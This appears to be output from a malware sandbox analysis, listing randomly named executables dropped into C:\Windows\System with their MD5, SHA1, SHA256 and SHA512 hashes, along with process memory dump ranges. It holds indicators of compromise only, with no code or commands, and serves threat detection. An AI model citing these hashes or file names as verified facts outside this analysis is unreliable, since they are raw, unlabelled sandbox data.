C:\Windows\System\YBDLdAk.exe

MD5 de2a00a9a2e00a214da611ceb95daa8e
SHA1 e908344a0f289e8df56179e8f3b963041d5c46b4
SHA256 0db7f70edc46f4fc25ca19338c151e8c18dab768eb9897becc23756aacb86a3a
SHA512 41ac4f158f3b9ccb93744d922c62cbc060452cba301ee1c69c9e542b2fffd27482ea9d91a8bd10c5f390b86164063ece41ab4c7d31be4900163ddbb7352405cc

C:\Windows\System\SaCJqpD.exe

MD5 5ef3b6da77ce0f910f2ff53e7ea6b437
SHA1 bac2e8ff0dd8f193b065bf10d93d5a865e6eb434
SHA256 d2cd225d21b71f61bd69d5628d239c1654881f68c3935594095935c428faee2b
SHA512 f4d63a2d2b66f9eea8d836dfa38ecc16be00df9af56828521142cf99cead269eebb95c5fe571a087e4e8e1e84fa95cf69958a35d51853481bb481786d6a89f97

C:\Windows\System\byuocGA.exe

MD5 49f9efee9e05f49b38dc96e0d03aa510
SHA1 13a688a70d5e177d9a927b5830feb454e22243ce
SHA256 fd276b8afaf89116d9d056ae6bd8c078395d32eae4939cb188067af39a62450c
SHA512 999d69bb5db0dfaa1b9e8f3cd78db322960e361cc3d50b8df3117b78d0b43633018a45ae80749fda82c49309a50bab838f4f6afcf81436fe707e9717b175b8fa

C:\Windows\System\ivViWCN.exe

MD5 ec310b3b223f4292d33a6ee09221b32a
SHA1 0bf313e915dcc2412b1cebbb5e76a9c713ee74a7
SHA256 6176fc12a722ac77ef7527d62b00155e30f1c4fbfd414dd1b87926284162314f
SHA512 0e6842ff972a1041ac88d070f249e99d1f7afd434688549d551162125eab7706d449a6d84b86764387c167129b0c678c37c7efe04fbd94dfdb03190f95ad78df

memory/4332-376-0x00007FF6888D0000-0x00007FF688CC6000-memory.dmp

memory/4204-375-0x00007FF6D2B10000-0x00007FF6D2F06000-memory.dmp

memory/3872-377-0x00007FF682790000-0x00007FF682B86000-memory.dmp

C:\Windows\System\gFHjYzr.exe

MD5 47c636407973a29d07dbff8480fb084d
SHA1 7d4ffd550d41fa3cb396b455173cf676ac85a298
SHA256 46774cf36f5c91373d9f381fc0f2da4bf3991c4533bfe14b2021e4680b583ece
SHA512 3215424341db714b1dfed8b6209a02b6b5678632a369cf730ffa4067e7acfeeeeaa783c36fb39ad8aef7771286cf3495774a818bec3b01ac873401e44d208137

C:\Windows\System\vqSOgPu.exe

MD5 a3ee1a2e9baeec23730aca4dd3004a94
SHA1 352db428acbed6632f80353f45bdd43e232632b9
SHA256 3b1fc3001e154c2b9cb936169ae83c2a6dbcb48f62dddaa247c392beb46ccea3
SHA512 4c60c765f7eeac31cff3c3a71c52b356387d61e71b85806ff16f0e13279b14ff05fe2dc0635d75273de7f0c6c11c38e968bcb59353c80a8a25b2d76177f6acf3

C:\Windows\System\fzGBTwh.exe

MD5 75f8765618958078bb72b532c04ebe6c
SHA1 abd2219ce9d4f3ef080cf7efe5933908823f949f
SHA256 98ff90590b1cce184e72d0b2e9a781ab27bac55453668f8c96d31392185a6534
SHA512 94fa05242898f3fed6437fcb00623ccc7d509a06627bbc16287dda37c1e02a7515ee3119ef3b2afc81748bb8c94cbf08dee8f8709149029d8064e01c53a01963

C:\Windows\System\PogDzva.exe

MD5 32436420b00ebcbeb31821ce13b22db7
SHA1 a419adea6b82dad38c0dfec0911a8c81c4487a88
SHA256 274f650ff6885cba1b35d93b56fb4af6cc4135c0381682956c0c0b9efd2b0156
SHA512 b41e9ea65ac9e4298c88cf00df8dce65fd76095201e5e72481abc3fd3c84ca67db20bc065bc567ac6826c80590db093841c3f58678dafebfbe66acf0226747db

C:\Windows\System\iLMcBQX.exe

MD5 7c8bdce0457ce6bff982d6e8f8c5236a
SHA1 c67720c69a119fc711f73229704871de56afa141
SHA256 2bc5d291da8437e57cd9ec44a00ebd185e542dfcb47302ccd9d688cc1edef608
SHA512 5ea29fbcf1fd56e6d5e365057839d243ba18023a2addf8307c9b2faf5da2b0096d1aa9205065abf4841cf5f1ab26a46dd4b556b0a78b7a8ac42c26232c724332

C:\Windows\System\ljLrXiy.exe

MD5 56e54a7adb509e9fa21057a892b6d115
SHA1 db44291eee7656b1049989586e59e72068e3e181
SHA256 5b54a57c75dc745d2cead1425eadbb3bc6e67f617122f358c94f369c1ac536ac
SHA512 e121100ceb7d4818738586556726bf47aa91b3261386ba3ae1633b5101a2d8caac98377002057f806415f068b4846cda2ef94cf9c6c147cca16f17a20c735c2c

memory/3784-1278-0x00007FF61E710000-0x00007FF61EB06000-memory.dmp

memory/3932-1284-0x00007FF920D60000-0x00007FF921821000-memory.dmp

memory/4588-1295-0x00007FF791B30000-0x00007FF791F26000-memory.dmp

memory/628-1294-0x00007FF7E5980000-0x00007FF7E5D76000-memory.dmp

memory/3932-1589-0x00007FF920D63000-0x00007FF920D65000-memory.dmp

memory/2520-1933-0x00007FF77E420000-0x00007FF77E816000-memory.dmp

C:\Windows\System\xMEUdJH.exe

MD5 68703642e5faeaf00b4b9f791a04a7f5
SHA1 2e8f5d51bda54b6b227caed2cb4535020c7a482c
SHA256 76bc446e18daed4e6417440c778e757728762c893f014de08ffa5f0fe98668bd
SHA512 0c1919485a30576b5fdf963204dc04b356f524c23dfb4ffaecdbb8a8ea4a0993cf3ac05bee011edf07b5b637ac7455499983eac22f5cdd87cd869e7a046115a5

memory/3320-2194-0x00007FF62B4A0000-0x00007FF62B896000-memory.dmp

memory/2908-2751-0x00007FF631A60000-0x00007FF631E56000-memory.dmp

memory/3556-4731-0x00007FF64EED0000-0x00007FF64F2C6000-memory.dmp

memory/628-4758-0x00007FF7E5980000-0x00007FF7E5D76000-memory.dmp

memory/4588-4761-0x00007FF791B30000-0x00007FF791F26000-memory.dmp

memory/3836-4763-0x00007FF65ED70000-0x00007FF65F166000-memory.dmp

memory/216-4767-0x00007FF783580000-0x00007FF783976000-memory.dmp

memory/4060-4768-0x00007FF7612E0000-0x00007FF7616D6000-memory.dmp

memory/4596-4772-0x00007FF775420000-0x00007FF775816000-memory.dmp

memory/4872-4771-0x00007FF75C4A0000-0x00007FF75C896000-memory.dmp

memory/2032-4770-0x00007FF79E3C0000-0x00007FF79E7B6000-memory.dmp

memory/4652-4964-0x00007FF671150000-0x00007FF671546000-memory.dmp

C:\Windows\System\gulUOcb.exe

MD5 1e115887da89dd331527c9a56198c05a
SHA1 775fd7400acf7d0ce532fe6e77c75a22fe9e230c
SHA256 1f3da7dc011cb34515f387ca2a526d38913785ce0fa141ec7fb7693fbec54d85
SHA512 ff900fcd4057e1f7839c6d429bf4ccbe12ce14bbb4a5dbaaf6535bdaf022b8b29e789eed53a21534de8dcc350cf129f984fa6cec2a0d3d4df59644bd36d66dd9